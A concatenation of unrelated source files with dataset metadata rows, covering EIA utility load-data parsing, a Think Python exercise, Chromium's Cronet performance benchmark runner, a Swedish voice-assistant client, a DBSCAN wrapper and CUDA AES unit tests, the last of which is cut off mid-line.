1994 : pd.read_fwf('%s/mapp/1994/MPSI94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/MPSI95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
}
}
mapp[20858][1997] = np.repeat(np.nan, len(mapp[20858][1997]))
mapp[21352][1995][mapp[21352][1995] < 0] = 0
mapp[40580][2000] = np.repeat(np.nan, len(mapp[40580][2000]))
if not os.path.exists('./mapp'):
os.mkdir('mapp')
for k in mapp.keys():
print k
s = pd.DataFrame(pd.concat([pd.Series(mapp[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(mapp[k][i]))) for i in mapp[k].keys()]).sort_index(), columns=['load'])
s['load'] = s['load'].astype(float).replace(0, np.nan)
s.to_csv('./mapp/%s.csv' % k)
#################################
# WECC
#################################
import numpy as np
import pandas as pd
import os
import re
import datetime
import time
import pysal as ps
homedir = os.path.expanduser('~')
#basepath = '/home/akagi/Documents/EIA_form_data/wecc_form_714'
basepath = '%s/github/RIPS_kircheis/data/eia_form_714/active' % (homedir)
path_d = {
1993: '93WSCC1/WSCC',
1994: '94WSCC1/WSCC1994',
1995: '95WSCC1',
1996: '96WSCC1/WSCC1996',
1997: '97wscc1',
1998: '98WSCC1/WSCC1',
1999: '99WSCC1/WSCC1',
2000: '00WSCC1/WSCC1',
2001: '01WECC/WECC01/wecc01',
2002: 'WECCONE3/WECC One/WECC2002',
2003: 'WECC/WECC/WECC ONE/wecc03',
2004: 'WECC_2004/WECC/WECC One/ferc',
2006: 'form714-database_2006_2013/form714-database/Part 3 Schedule 2 - Planning Area Hourly Demand.csv'
}
#### GET UNIQUE UTILITIES AND UTILITIES BY YEAR
u_by_year = {}
for d in path_d:
if d != 2006:
full_d = basepath + '/' + path_d[d]
l = [i.lower().split('.')[0][:-2] for i in os.listdir(full_d) if i.lower().endswith('dat')]
u_by_year.update({d : sorted(l)})
unique_u = np.unique(np.concatenate([np.array(i) for i in u_by_year.values()]))
#### GET EIA CODES OF WECC UTILITIES
rm_d = {1993: {'rm': '93WSCC1/README2'},
1994: {'rm': '94WSCC1/README.TXT'},
1995: {'rm': '95WSCC1/README.TXT'},
1996: {'rm': '96WSCC1/README.TXT'},
1997: {'rm': '97wscc1/README.TXT'},
1998: {'rm': '98WSCC1/WSCC1/part.002'},
1999: {'rm': '99WSCC1/WSCC1/README.TXT'},
2000: {'rm': '00WSCC1/WSCC1/README.TXT'},
2001: {'rm': '01WECC/WECC01/wecc01/README.TXT'},
2002: {'rm': 'WECCONE3/WECC One/WECC2002/README.TXT'},
2003: {'rm': 'WECC/WECC/WECC ONE/wecc03/README.TXT'},
2004: {'rm': 'WECC_2004/WECC/WECC One/ferc/README.TXT'}}
for d in rm_d.keys():
fn = basepath + '/' + rm_d[d]['rm']
f = open(fn, 'r')
r = f.readlines()
f.close()
for i in range(len(r)):
if 'FILE NAME' in r[i]:
rm_d[d].update({'op': i})
if 'FERC' and 'not' in r[i]:
rm_d[d].update({'ed': i})
unique_u_ids = {}
for u in unique_u:
regex = re.compile('^ *%s\d\d.dat' % u, re.IGNORECASE)
for d in rm_d.keys():
fn = basepath + '/' + rm_d[d]['rm']
f = open(fn, 'r')
r = f.readlines() #[rm_d[d]['op']:rm_d[d]['ed']]
f.close()
for line in r:
result = re.search(regex, line)
if result:
# print line
code = line.split()[1]
nm = line.split(code)[1].strip()
unique_u_ids.update({u : {'code':code, 'name':nm}})
break
else:
continue
if u in unique_u_ids:
break
else:
continue
#id_2006 = pd.read_csv('/home/akagi/Documents/EIA_form_data/wecc_form_714/form714-database_2006_2013/form714-database/Respondent IDs.csv')
id_2006 = pd.read_csv('%s/form714-database_2006_2013/form714-database/Respondent IDs.csv' % (basepath))
id_2006 = id_2006.drop_duplicates('eia_code').set_index('eia_code').sort_index()
ui = pd.DataFrame.from_dict(unique_u_ids, orient='index')
ui = ui.loc[ui['code'] != '*'].drop_duplicates('code')
ui['code'] = ui['code'].astype(int)
ui = ui.set_index('code')
eia_to_r = pd.concat([ui, id_2006], axis=1).dropna()
# util = {
# 'aps' : 803,
# 'srp' : 16572,
# 'ldwp' : 11208
# }
# util_2006 = {
# 'aps' : 116,
# 'srp' : 244,
# 'ldwp' : 194
# }
#resp_ids = '/home/akagi/Documents/EIA_form_data/wecc_form_714/form714-database_2006_2013/form714-database/Respondent IDs.csv'
resp_ids = '%s/form714-database_2006_2013/form714-database/Respondent IDs.csv' % (basepath)
df_path_d = {}
def build_paths():
for y in path_d.keys():
if y < 2006:
pathstr = basepath + '/' + path_d[y]
dirstr = ' '.join(os.listdir(pathstr))
# print dirstr
for u in u_by_year[y]:
if not u in df_path_d:
df_path_d.update({u : {}})
srcstr = '%s\d\d.dat' % (u)
# print srcstr
match = re.search(srcstr, dirstr, re.I)
# print type(match.group())
rpath = pathstr + '/' + match.group()
df_path_d[u].update({y : rpath})
elif y == 2006:
pathstr = basepath + '/' + path_d[y]
for u in unique_u:
if not u in df_path_d:
df_path_d.update({u : {}})
df_path_d[u].update({y : pathstr})
df_d = {}
def build_df(u):
print u
df = pd.DataFrame()
for y in sorted(df_path_d[u].keys()):
print y
if y < 2006:
f = open(df_path_d[u][y], 'r')
r = f.readlines()
f.close()
#### DISCARD BINARY-ENCODED FILES
try:
enc = r[0].decode()
except:
enc = None
pass
if enc:
r = [g.replace('\t', ' ') for g in r if len(g) > 70]
if not str.isdigit(r[0][0]):
for line in range(len(r)):
try:
chk = int(''.join(r[line].rstrip().split()))
if chk:
# print line, r[line]
r = r[line:]
break
except:
continue
for i in range(0, len(r)-1, 2):
# print i
entry = [r[i], r[i+1]]
mo = int(r[i][:2])
day = int(r[i][2:4])
yr = y
# yr = r[i][4:6]
# if yr[0] == '0':
# yr = int('20' + yr)
# else:
# yr = int('19' + yr)
if (len(entry[0].rstrip()) + len(entry[1].rstrip())) == 160:
try:
am = [int(j) if j.strip() != '' else None for j in re.findall('.{5}', entry[0][20:].rstrip())]
pm = [int(j) if j.strip() != '' else None for j in re.findall('.{5}', entry[1][20:].rstrip())]
assert(len(am)==12)
assert(len(pm)==12)
except:
am = [int(j) for j in entry[0][20:].rstrip().split()]
pm = [int(j) for j in entry[1][20:].rstrip().split()]
assert(len(am)==12)
assert(len(pm)==12)
else:
try:
am = [int(j) for j in entry[0][20:].rstrip().split()]
pm = [int(j) for j in entry[1][20:].rstrip().split()]
assert(len(am)==12)
assert(len(pm)==12)
except:
try:
am = [int(j) if j.strip() != '' else None for j in re.findall('.{5}', entry[0][20:].rstrip())]
pm = [int(j) if j.strip() != '' else None for j in re.findall('.{5}', entry[1][20:].rstrip())]
if len(am) < 12:
am_arr = np.array(am)
am = np.pad(am_arr, (0, (12 - np.array(am).shape[0])), mode='symmetric').tolist()
if len(pm) < 12:
pm_arr = np.array(pm)
pm = np.pad(pm_arr, (0, (12 - np.array(pm).shape[0])), mode='symmetric').tolist()
if len(am) > 12:
am = am[:12]
if len(pm) > 12:
pm = pm[:12]
except:
print 'Cannot read line'
am = np.repeat(np.nan, 12).tolist()
pm = np.repeat(np.nan, 12).tolist()
ampm = am + pm
entry_df = pd.DataFrame()
try:
dt_ix = pd.date_range(start=datetime.datetime(yr, mo, day, 0), end=datetime.datetime(yr, mo, day, 23), freq='H')
entry_df['load'] = ampm
# print entry_df
entry_df.index = dt_ix
df = df.append(entry_df)
except:
entry_df['load'] = ampm
yest = df.index.to_pydatetime()[-1]
dt_ix = pd.date_range(start=(yest + datetime.timedelta(hours=1)), end=(yest + datetime.timedelta(hours=24)), freq='H')
entry_df.index = dt_ix
df = df.append(entry_df)
elif y == 2006:
f = pd.read_csv('%s/%s' % (basepath, path_d[y]))
if u in unique_u_ids.keys():
if str.isdigit(unique_u_ids[u]['code']):
eiacode = int(unique_u_ids[u]['code'])
if eiacode in eia_to_r.index.values:
if eia_to_r.loc[eiacode, 'respondent_id'] in f['respondent_id'].unique():
f = f.loc[f['respondent_id'] == eia_to_r.loc[eiacode, 'respondent_id'], [u'plan_date', u'hour01', u'hour02', u'hour03', u'hour04', u'hour05', u'hour06', u'hour07', u'hour08', u'hour09', u'hour10', u'hour11', u'hour12', u'hour13', u'hour14', u'hour15', u'hour16', u'hour17', u'hour18', u'hour19', u'hour20', u'hour21', u'hour22', u'hour23', u'hour24']]
f['plan_date'] = f['plan_date'].str.split().apply(lambda x: x[0]).apply(lambda x: datetime.datetime.strptime(x, '%m/%d/%Y'))
f = f.set_index('plan_date').stack().reset_index().rename(columns={'level_1':'hour', 0:'load'})
f['hour'] = f['hour'].str.replace('hour','').astype(int)-1
f['date'] = f.apply(lambda x: datetime.datetime(x['plan_date'].year, x['plan_date'].month, x['plan_date'].day, x['hour']), axis=1)
f = pd.DataFrame(f.set_index('date')['load'])
df = pd.concat([df, f], axis=0)
return df
build_paths()
#### Southern California Edison part of CAISO in 2006-2013: resp id 125
if not os.path.exists('./wecc'):
os.mkdir('wecc')
for x in unique_u:
out_df = build_df(x)
if x in unique_u_ids.keys():
if str.isdigit(unique_u_ids[x]['code']):
out_df.to_csv('./wecc/%s.csv' % unique_u_ids[x]['code'])
else:
out_df.to_csv('./wecc/%s.csv' % x)
else:
out_df.to_csv('./wecc/%s.csv' % x)
#################################
from itertools import chain
li = []
for fn in os.listdir('.'):
li.append(os.listdir('./%s' % (fn)))
s = pd.Series(list(chain(*li)))
s = s.str.replace('\.csv', '')
u = s[s.str.contains('\d+')].str.replace('[^\d]', '').astype(int).unique()
homedir = os.path.expanduser('~')
rid = pd.read_csv('%s/github/RIPS_kircheis/data/eia_form_714/active/form714-database/form714-database/Respondent IDs.csv' % homedir)
ridu = rid[rid['eia_code'] != 0]
ridu[~ridu['eia_code'].isin(u)]
| 6,648 | 0 | 58 |
1b8521730032e7c2ffb0cc02b2601ecc37bd48c9 | 287 | py | Python | Chapter06/ex6_4.py | MJC-code/thinkpython | c92702b64a174e85294b17d8bed870977007842b | [
"Unlicense"
] | null | null | null | Chapter06/ex6_4.py | MJC-code/thinkpython | c92702b64a174e85294b17d8bed870977007842b | [
"Unlicense"
] | null | null | null | Chapter06/ex6_4.py | MJC-code/thinkpython | c92702b64a174e85294b17d8bed870977007842b | [
"Unlicense"
] | null | null | null |
print (is_power(16, 2))
print (is_power(17, 2))
print (is_power(1, 1))
print (is_power(0, 0))
print (is_power(-8 , -2))
print (is_power(-27, -3))
| 17.9375 | 31 | 0.554007 | def is_power(a, b):
if a == b:
return True
elif a % b != 0:
return False
else:
return is_power(a/b, b)
print (is_power(16, 2))
print (is_power(17, 2))
print (is_power(1, 1))
print (is_power(0, 0))
print (is_power(-8 , -2))
print (is_power(-27, -3))
| 117 | 0 | 22 |
d973fd1fe77b39f7ee1f99bab397580e0c606b2c | 8,433 | py | Python | components/cronet/android/test/javaperftests/run.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 76 | 2020-09-02T03:05:41.000Z | 2022-03-30T04:40:55.000Z | components/cronet/android/test/javaperftests/run.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 45 | 2020-09-02T03:21:37.000Z | 2022-03-31T22:19:45.000Z | components/cronet/android/test/javaperftests/run.py | zealoussnow/chromium | fd8a8914ca0183f0add65ae55f04e287543c7d4a | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 8 | 2020-07-22T18:49:18.000Z | 2022-02-08T10:27:16.000Z | #!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This script runs an automated Cronet performance benchmark.
This script:
1. Sets up "USB reverse tethering" which allow network traffic to flow from
an Android device connected to the host machine via a USB cable.
2. Starts HTTP and QUIC servers on the host machine.
3. Installs an Android app on the attached Android device and runs it.
4. Collects the results from the app.
Prerequisites:
1. A rooted (i.e. "adb root" succeeds) Android device connected via a USB cable
to the host machine (i.e. the computer running this script).
2. quic_server has been built for the host machine, e.g. via:
gn gen out/Release --args="is_debug=false"
ninja -C out/Release quic_server
3. cronet_perf_test_apk has been built for the Android device, e.g. via:
./components/cronet/tools/cr_cronet.py gn -r
ninja -C out/Release cronet_perf_test_apk
4. If "sudo ufw status" doesn't say "Status: inactive", run "sudo ufw disable".
5. sudo apt-get install lighttpd
6. If the usb0 interface on the host keeps losing it's IPv4 address
(WaitFor(HasHostAddress) will keep failing), NetworkManager may need to be
told to leave usb0 alone with these commands:
sudo bash -c "printf \"\\n[keyfile]\
\\nunmanaged-devices=interface-name:usb0\\n\" \
>> /etc/NetworkManager/NetworkManager.conf"
sudo service network-manager restart
Invocation:
./run.py
Output:
Benchmark timings are output by telemetry to stdout and written to
./results.html
"""
import json
import optparse
import os
import shutil
import sys
import tempfile
import time
import urllib
REPOSITORY_ROOT = os.path.abspath(os.path.join(
os.path.dirname(__file__), '..', '..', '..', '..', '..'))
sys.path.append(os.path.join(REPOSITORY_ROOT, 'tools', 'perf'))
sys.path.append(os.path.join(REPOSITORY_ROOT, 'build', 'android'))
sys.path.append(os.path.join(REPOSITORY_ROOT, 'components'))
# pylint: disable=wrong-import-position
from chrome_telemetry_build import chromium_config
from devil.android import device_utils
from devil.android.sdk import intent
from core import benchmark_runner
from cronet.tools import android_rndis_forwarder
from cronet.tools import perf_test_utils
import lighttpd_server
from pylib import constants
from telemetry import android
from telemetry import benchmark
from telemetry import story
from telemetry.web_perf import timeline_based_measurement
# pylint: enable=wrong-import-position
# Android AppStory implementation wrapping CronetPerfTest app.
# Launches Cronet perf test app and waits for execution to complete
# by waiting for presence of DONE_FILE.
# For now AndroidStory's SharedAppState works only with
# TimelineBasedMeasurements, so implement one that just forwards results from
# Cronet perf test app.
if __name__ == '__main__':
main()
| 37.986486 | 80 | 0.748725 | #!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This script runs an automated Cronet performance benchmark.
This script:
1. Sets up "USB reverse tethering" which allow network traffic to flow from
an Android device connected to the host machine via a USB cable.
2. Starts HTTP and QUIC servers on the host machine.
3. Installs an Android app on the attached Android device and runs it.
4. Collects the results from the app.
Prerequisites:
1. A rooted (i.e. "adb root" succeeds) Android device connected via a USB cable
to the host machine (i.e. the computer running this script).
2. quic_server has been built for the host machine, e.g. via:
gn gen out/Release --args="is_debug=false"
ninja -C out/Release quic_server
3. cronet_perf_test_apk has been built for the Android device, e.g. via:
./components/cronet/tools/cr_cronet.py gn -r
ninja -C out/Release cronet_perf_test_apk
4. If "sudo ufw status" doesn't say "Status: inactive", run "sudo ufw disable".
5. sudo apt-get install lighttpd
6. If the usb0 interface on the host keeps losing it's IPv4 address
(WaitFor(HasHostAddress) will keep failing), NetworkManager may need to be
told to leave usb0 alone with these commands:
sudo bash -c "printf \"\\n[keyfile]\
\\nunmanaged-devices=interface-name:usb0\\n\" \
>> /etc/NetworkManager/NetworkManager.conf"
sudo service network-manager restart
Invocation:
./run.py
Output:
Benchmark timings are output by telemetry to stdout and written to
./results.html
"""
import json
import optparse
import os
import shutil
import sys
import tempfile
import time
import urllib
REPOSITORY_ROOT = os.path.abspath(os.path.join(
os.path.dirname(__file__), '..', '..', '..', '..', '..'))
sys.path.append(os.path.join(REPOSITORY_ROOT, 'tools', 'perf'))
sys.path.append(os.path.join(REPOSITORY_ROOT, 'build', 'android'))
sys.path.append(os.path.join(REPOSITORY_ROOT, 'components'))
# pylint: disable=wrong-import-position
from chrome_telemetry_build import chromium_config
from devil.android import device_utils
from devil.android.sdk import intent
from core import benchmark_runner
from cronet.tools import android_rndis_forwarder
from cronet.tools import perf_test_utils
import lighttpd_server
from pylib import constants
from telemetry import android
from telemetry import benchmark
from telemetry import story
from telemetry.web_perf import timeline_based_measurement
# pylint: enable=wrong-import-position
def GetDevice():
devices = device_utils.DeviceUtils.HealthyDevices()
assert len(devices) == 1
return devices[0]
class CronetPerfTestAndroidStory(android.AndroidStory):
# Android AppStory implementation wrapping CronetPerfTest app.
# Launches Cronet perf test app and waits for execution to complete
# by waiting for presence of DONE_FILE.
def __init__(self, device):
self._device = device
config = perf_test_utils.GetConfig(device)
device.RemovePath(config['DONE_FILE'], force=True)
self.url ='http://dummy/?'+urllib.urlencode(config)
start_intent = intent.Intent(
package=perf_test_utils.APP_PACKAGE,
activity=perf_test_utils.APP_ACTIVITY,
action=perf_test_utils.APP_ACTION,
# |config| maps from configuration value names to the configured values.
# |config| is encoded as URL parameter names and values and passed to
# the Cronet perf test app via the Intent data field.
data=self.url,
extras=None,
category=None)
super(CronetPerfTestAndroidStory, self).__init__(
start_intent, name='CronetPerfTest',
# No reason to wait for app; Run() will wait for results. By default
# StartActivity will timeout waiting for CronetPerfTest, so override
# |is_app_ready_predicate| to not wait.
is_app_ready_predicate=lambda app: True)
def Run(self, shared_user_story_state):
while not self._device.FileExists(
perf_test_utils.GetConfig(self._device)['DONE_FILE']):
time.sleep(1.0)
class CronetPerfTestStorySet(story.StorySet):
def __init__(self, device):
super(CronetPerfTestStorySet, self).__init__()
# Create and add Cronet perf test AndroidStory.
self.AddStory(CronetPerfTestAndroidStory(device))
class CronetPerfTestMeasurement(
timeline_based_measurement.TimelineBasedMeasurement):
# For now AndroidStory's SharedAppState works only with
# TimelineBasedMeasurements, so implement one that just forwards results from
# Cronet perf test app.
def __init__(self, device, options):
super(CronetPerfTestMeasurement, self).__init__(options)
self._device = device
def WillRunStory(self, platform, story=None):
# Skip parent implementation which doesn't apply to Cronet perf test app as
# it is not a browser with a timeline interface.
pass
def Measure(self, platform, results):
# Reads results from |RESULTS_FILE| on target and adds to |results|.
jsonResults = json.loads(self._device.ReadFile(
perf_test_utils.GetConfig(self._device)['RESULTS_FILE']))
for test in jsonResults:
results.AddMeasurement(test, 'ms', jsonResults[test])
def DidRunStory(self, platform, results):
# Skip parent implementation which calls into tracing_controller which this
# doesn't have.
pass
class CronetPerfTestBenchmark(benchmark.Benchmark):
# Benchmark implementation spawning off Cronet perf test measurement and
# StorySet.
SUPPORTED_PLATFORMS = [story.expectations.ALL_ANDROID]
def __init__(self, max_failures=None):
super(CronetPerfTestBenchmark, self).__init__(max_failures)
self._device = GetDevice()
def CreatePageTest(self, options):
return CronetPerfTestMeasurement(self._device, options)
def CreateStorySet(self, options):
return CronetPerfTestStorySet(self._device)
def main():
parser = optparse.OptionParser()
parser.add_option('--output-format', default='html',
help='The output format of the results file.')
parser.add_option('--output-dir', default=None,
help='The directory for the output file. Default value is '
'the base directory of this script.')
options, _ = parser.parse_args()
constants.SetBuildType(perf_test_utils.BUILD_TYPE)
# Install APK
device = GetDevice()
device.EnableRoot()
device.Install(perf_test_utils.APP_APK)
# Start USB reverse tethering.
android_rndis_forwarder.AndroidRndisForwarder(device,
perf_test_utils.GetAndroidRndisConfig(device))
# Start HTTP server.
http_server_doc_root = perf_test_utils.GenerateHttpTestResources()
config_file = tempfile.NamedTemporaryFile()
http_server = lighttpd_server.LighttpdServer(http_server_doc_root,
port=perf_test_utils.HTTP_PORT,
base_config_path=config_file.name)
perf_test_utils.GenerateLighttpdConfig(config_file, http_server_doc_root,
http_server)
assert http_server.StartupHttpServer()
config_file.close()
# Start QUIC server.
quic_server_doc_root = perf_test_utils.GenerateQuicTestResources(device)
quic_server = perf_test_utils.QuicServer(quic_server_doc_root)
quic_server.StartupQuicServer(device)
# Launch Telemetry's benchmark_runner on CronetPerfTestBenchmark.
# By specifying this file's directory as the benchmark directory, it will
# allow benchmark_runner to in turn open this file up and find the
# CronetPerfTestBenchmark class to run the benchmark.
top_level_dir = os.path.dirname(os.path.realpath(__file__))
expectations_files = [os.path.join(top_level_dir, 'expectations.config')]
runner_config = chromium_config.ChromiumConfig(
top_level_dir=top_level_dir,
benchmark_dirs=[top_level_dir],
expectations_files=expectations_files)
sys.argv.insert(1, 'run')
sys.argv.insert(2, 'run.CronetPerfTestBenchmark')
sys.argv.insert(3, '--browser=android-system-chrome')
sys.argv.insert(4, '--output-format=' + options.output_format)
if options.output_dir:
sys.argv.insert(5, '--output-dir=' + options.output_dir)
benchmark_runner.main(runner_config)
# Shutdown.
quic_server.ShutdownQuicServer()
shutil.rmtree(quic_server_doc_root)
http_server.ShutdownHttpServer()
shutil.rmtree(http_server_doc_root)
if __name__ == '__main__':
main()
| 4,751 | 378 | 313 |
2ead7fcbf16c57d47c0cdfebf8d054f705e2f8be | 1,923 | py | Python | client_barvis/main.py | antonstagge/BarvisRepo | 3cc780c09839855a6b1704d0975cf6d4af1beb1a | [
"MIT"
] | null | null | null | client_barvis/main.py | antonstagge/BarvisRepo | 3cc780c09839855a6b1704d0975cf6d4af1beb1a | [
"MIT"
] | null | null | null | client_barvis/main.py | antonstagge/BarvisRepo | 3cc780c09839855a6b1704d0975cf6d4af1beb1a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import requests
import os
from threading import Thread
import website
import ai_request
import speech_recognition
import json
recognizer = speech_recognition.Recognizer()
with speech_recognition.Microphone() as source1:
recognizer.adjust_for_ambient_noise(source1)
websiteThread = Thread(target=startWebsite)
websiteThread.start()
waitForBarvis()
#websiteThread.join()
| 26.708333 | 75 | 0.627665 | # -*- coding: utf-8 -*-
import requests
import os
from threading import Thread
import website
import ai_request
import speech_recognition
import json
recognizer = speech_recognition.Recognizer()
with speech_recognition.Microphone() as source1:
recognizer.adjust_for_ambient_noise(source1)
def startWebsite():
website.run()
def speak(text):
newText = str(text)
os.system("say " + newText)
def listen(timeout):
with speech_recognition.Microphone() as source:
recognizer.adjust_for_ambient_noise(source, 0.5)
print "listening"
try:
audio = recognizer.listen(source, timeout=timeout)
except speech_recognition.WaitTimeoutError as e:
audio = None
print "done listening"
if audio is not None:
try:
# return recognizer.recognize_sphinx(audio)
return recognizer.recognize_google(audio, language="sv-SE")
except speech_recognition.UnknownValueError:
print("Could not understand audio")
except speech_recognition.RequestError as e:
print("Recog Error; {0}".format(e))
return ""
def waitForBarvis():
while True:
prompt = listen(1)
print prompt
if "Barbies" in prompt or "Paris" in prompt or "Buddies" in prompt:
speak("Vad kan jag hjälpa dig med?")
command = listen(5)
if command == "":
continue
print command
response = ai_request.aiQurey(command)
print response
jsonRespone = json.loads(response)
action = jsonRespone["result"]["action"]
print action
if action == "fromTo":
speak("From To action")
else:
speak("Jag kan inte hjälpa dig med det.")
websiteThread = Thread(target=startWebsite)
websiteThread.start()
waitForBarvis()
#websiteThread.join()
| 1,426 | 0 | 92 |
5f5344be6f31c8367be35c2e6cd57644f235871b | 626 | py | Python | cloudframe/resource/v1/res01.py | cloudken/faasframe-py | 50c8cffac3fb20a096c1906b4828b5ec9aee3ba9 | [
"Apache-2.0"
] | null | null | null | cloudframe/resource/v1/res01.py | cloudken/faasframe-py | 50c8cffac3fb20a096c1906b4828b5ec9aee3ba9 | [
"Apache-2.0"
] | null | null | null | cloudframe/resource/v1/res01.py | cloudken/faasframe-py | 50c8cffac3fb20a096c1906b4828b5ec9aee3ba9 | [
"Apache-2.0"
] | null | null | null |
from six.moves import http_client
from cloudframe.common import job
import logging
import time
LOG = logging.getLogger(__name__)
| 17.885714 | 44 | 0.670927 |
from six.moves import http_client
from cloudframe.common import job
import logging
import time
LOG = logging.getLogger(__name__)
def post(tenant, req):
ack = {'status': 'OK'}
job.rpc_cast(_create_server, server=req)
return http_client.OK, ack
def put(tenant, res_id, req):
ack = {'status': 'OK'}
return http_client.OK, ack
def get(tenant, res_id=None):
ack = {'status': 'OK'}
return http_client.OK, ack
def delete(tenant, res_id):
ack = {'status': 'OK'}
return http_client.OK, ack
def _create_server(server):
time.sleep(5)
LOG.debug('create server success!')
return
| 375 | 0 | 115 |
18cc7423efdb3b5478240fcfb75681630b42f92b | 1,237 | py | Python | mlperf/clustering/dbscan/run_base.py | xinyin1990/ml-perf | a5367b41dffe188b3e86fa3e2fcf975bfcd1afb2 | [
"MIT"
] | null | null | null | mlperf/clustering/dbscan/run_base.py | xinyin1990/ml-perf | a5367b41dffe188b3e86fa3e2fcf975bfcd1afb2 | [
"MIT"
] | null | null | null | mlperf/clustering/dbscan/run_base.py | xinyin1990/ml-perf | a5367b41dffe188b3e86fa3e2fcf975bfcd1afb2 | [
"MIT"
] | null | null | null | import csv
import os
import re
import subprocess
from mlperf.clustering.tools import dumpDataOnCleanCsv
from mlperf.tools.config import MATLAB_EXE, TEMPFOLDER, JAVA_EXE, R_BIN
from mlperf.tools.static import datasetOutFile, MATLAB_ALGO, matlabRedirectTempFolder, WEKA_ALGO, JAVA_CLASSPATH, \
SKLEARN_ALGO, R_ALGO, SHOGUN_ALGO
| 33.432432 | 115 | 0.719483 | import csv
import os
import re
import subprocess
from mlperf.clustering.tools import dumpDataOnCleanCsv
from mlperf.tools.config import MATLAB_EXE, TEMPFOLDER, JAVA_EXE, R_BIN
from mlperf.tools.static import datasetOutFile, MATLAB_ALGO, matlabRedirectTempFolder, WEKA_ALGO, JAVA_CLASSPATH, \
SKLEARN_ALGO, R_ALGO, SHOGUN_ALGO
def sklearnProcess(clustersNumber, dataLessTarget, datasetName, runinfo = None):
import sklearn.cluster
selectedAlgo = SKLEARN_ALGO
outputFile = datasetOutFile(datasetName, selectedAlgo, runinfo=runinfo)
if os.path.exists(outputFile):
print("sklearn skipped")
return
#print(clustersNumber, dataLessTarget, datasetName, runinfo)
i = re.fullmatch("[^0-9]*?([0-9]+)", runinfo)
i = int(i.group(1))
eps_value = 0.33 * i
sample_value = i%10
if sample_value == 0:
sample_value = 10
builtModel = sklearn.cluster.DBSCAN(eps = eps_value, min_samples = sample_value)
builtModel.fit(dataLessTarget)
with open(outputFile, 'w') as csvfile:
filewriter = csv.writer(csvfile, quoting=csv.QUOTE_MINIMAL)
for index, row in dataLessTarget.iterrows():
filewriter.writerow([index, builtModel.labels_[index]])
| 883 | 0 | 23 |
19bcc48ee9fb238f298a5fac6d357b057a29c779 | 4,499 | py | Python | test/unit/test_02_utils.py | au9ustine/cuda_aes | 873e6768f34de1ea07fc71fc33475c9cd09843ea | [
"BSD-3-Clause"
] | 2 | 2015-06-13T01:44:31.000Z | 2016-05-16T03:09:21.000Z | test/unit/test_02_utils.py | au9ustine/cuda_aes | 873e6768f34de1ea07fc71fc33475c9cd09843ea | [
"BSD-3-Clause"
] | 7 | 2015-06-13T02:55:34.000Z | 2015-07-16T16:29:21.000Z | test/unit/test_02_utils.py | au9ustine/cuda_aes | 873e6768f34de1ea07fc71fc33475c9cd09843ea | [
"BSD-3-Clause"
] | null | null | null | import array
import hashlib
import json
import os.path
import ctypes
from ctypes import *
import utils
logger = utils.get_logger('test_02_utils')
my_lib = load_shared_library()
| 95.723404 | 2,813 | 0.766615 | import array
import hashlib
import json
import os.path
import ctypes
from ctypes import *
import utils
logger = utils.get_logger('test_02_utils')
def load_shared_library():
my_lib_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'..',
'..',
'src', 'cuda_aes_for_py.so')
assert os.path.exists(my_lib_path) is True
my_lib = CDLL(my_lib_path)
return my_lib
my_lib = load_shared_library()
def test_my_str2bytearray():
dst_len = c_uint32(0x10)
dst = create_string_buffer(0x10)
src = '000102030405060708090a0b0c0d0e0f'
src_len = c_uint32(len(src))
my_lib.str2bytearray(dst, dst_len, src, src_len)
assert dst.raw == '\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f'
def test_my_str2uintarray():
dst_len = c_uint32(0x10)
dst = create_string_buffer(0x10 * 4)
src = '000102030405060708090a0b0c0d0e0f'
src_len = c_uint32(len(src))
my_lib.str2uintarray(dst, dst_len, src, src_len)
assert dst.raw == '\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00\x09\x00\x00\x00\x0a\x00\x00\x00\x0b\x00\x00\x00\x0c\x00\x00\x00\x0d\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00'
def test_parse_test_data():
test_data = utils.read_rsp_file('CBC', 'GFSbox', 128)
expected = {'DECRYPT': [{'COUNT': 0, 'PLAINTEXT': 'f34481ec3cc627bacd5dc3fb08f273e6', 'CIPHERTEXT': '0336763e966d92595a567cc9ce537f5e', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 1, 'PLAINTEXT': '9798c4640bad75c7c3227db910174e72', 'CIPHERTEXT': 'a9a1631bf4996954ebc093957b234589', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 2, 'PLAINTEXT': '96ab5c2ff612d9dfaae8c31f30c42168', 'CIPHERTEXT': 'ff4f8391a6a40ca5b25d23bedd44a597', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 3, 'PLAINTEXT': '6a118a874519e64e9963798a503f1d35', 'CIPHERTEXT': 'dc43be40be0e53712f7e2bf5ca707209', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 4, 'PLAINTEXT': 'cb9fceec81286ca3e989bd979b0cb284', 'CIPHERTEXT': '92beedab1895a94faa69b632e5cc47ce', 'KEY': '00000000000000000000000000000000', 'IV': '00000000000000000000000000000000'}, {'COUNT': 5, 'PLAINTEXT': 'b26aeb1874e47ca8358ff22378f09144', 